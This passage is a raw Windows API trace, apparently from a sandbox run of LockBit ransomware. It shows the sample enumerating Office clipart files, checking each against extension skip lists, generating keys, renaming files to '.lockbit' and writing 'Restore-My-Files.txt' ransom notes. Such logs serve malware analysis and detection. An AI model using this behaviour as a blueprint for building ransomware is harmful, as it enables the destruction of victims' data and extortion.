[0103.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0103.448] ReadFile (in: hFile=0x304, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.456] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.456] malloc (_Size=0xa6) returned 0x77d800 [0103.456] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.456] free (_Block=0x77d800) [0103.457] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.457] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.457] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04369_.WMF", cAlternateFileName="")) returned 1 [0103.457] lstrcmpiW (lpString1=".", lpString2="AN04369_.WMF") returned -1 [0103.457] lstrcmpiW (lpString1="..", lpString2="AN04369_.WMF") returned -1 [0103.457] PathFindExtensionW (pszPath="AN04369_.WMF") returned=".WMF" [0103.457] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.457] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.458] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.458] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.459] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04369_.WMF") returned 1 [0103.459] lstrcmpiW (lpString1="ntldr", lpString2="AN04369_.WMF") returned 1 [0103.460] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04369_.WMF") returned 1 [0103.460] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04369_.WMF") returned 1 [0103.460] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04369_.WMF") returned 1 [0103.460] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04369_.WMF") returned 1 [0103.460] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04369_.WMF") returned 1 [0103.460] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.460] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned=".WMF" [0103.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.460] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.460] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.461] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.461] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.lockbit") returned 72 [0103.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.462] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.462] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.462] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4808) returned 1 [0103.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.464] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.470] malloc (_Size=0xa6) returned 0x77d800 [0103.470] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.471] free (_Block=0x77d800) [0103.471] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.471] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.471] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.471] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04384_.WMF", cAlternateFileName="")) returned 1 [0103.471] lstrcmpiW (lpString1=".", lpString2="AN04384_.WMF") returned -1 [0103.471] lstrcmpiW (lpString1="..", lpString2="AN04384_.WMF") returned -1 [0103.471] PathFindExtensionW (pszPath="AN04384_.WMF") returned=".WMF" [0103.471] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.471] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.472] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.472] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.473] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04384_.WMF") returned 1 [0103.473] lstrcmpiW (lpString1="ntldr", lpString2="AN04384_.WMF") returned 1 [0103.473] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04384_.WMF") returned 1 [0103.473] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04384_.WMF") returned 1 [0103.473] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04384_.WMF") returned 1 [0103.473] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04384_.WMF") returned 1 [0103.474] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04384_.WMF") returned 1 [0103.474] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.474] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned=".WMF" [0103.474] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.474] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.474] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.475] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.475] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.lockbit") returned 72 [0103.475] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f8 [0103.476] CreateIoCompletionPort (FileHandle=0x2f8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.476] malloc (_Size=0x40068) returned 0x3d70048 [0103.476] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4996) returned 1 [0103.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0103.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0103.477] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0103.495] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.495] malloc (_Size=0xa6) returned 0x77d800 [0103.495] NtSetInformationFile (FileHandle=0x2f8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.496] free (_Block=0x77d800) [0103.496] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.496] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.496] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04385_.WMF", cAlternateFileName="")) returned 1 [0103.496] lstrcmpiW (lpString1=".", lpString2="AN04385_.WMF") returned -1 [0103.496] lstrcmpiW (lpString1="..", lpString2="AN04385_.WMF") returned -1 [0103.496] PathFindExtensionW (pszPath="AN04385_.WMF") returned=".WMF" [0103.497] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.497] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.498] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.498] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04385_.WMF") returned 1 [0103.499] lstrcmpiW (lpString1="ntldr", lpString2="AN04385_.WMF") returned 1 [0103.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04385_.WMF") returned 1 [0103.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04385_.WMF") returned 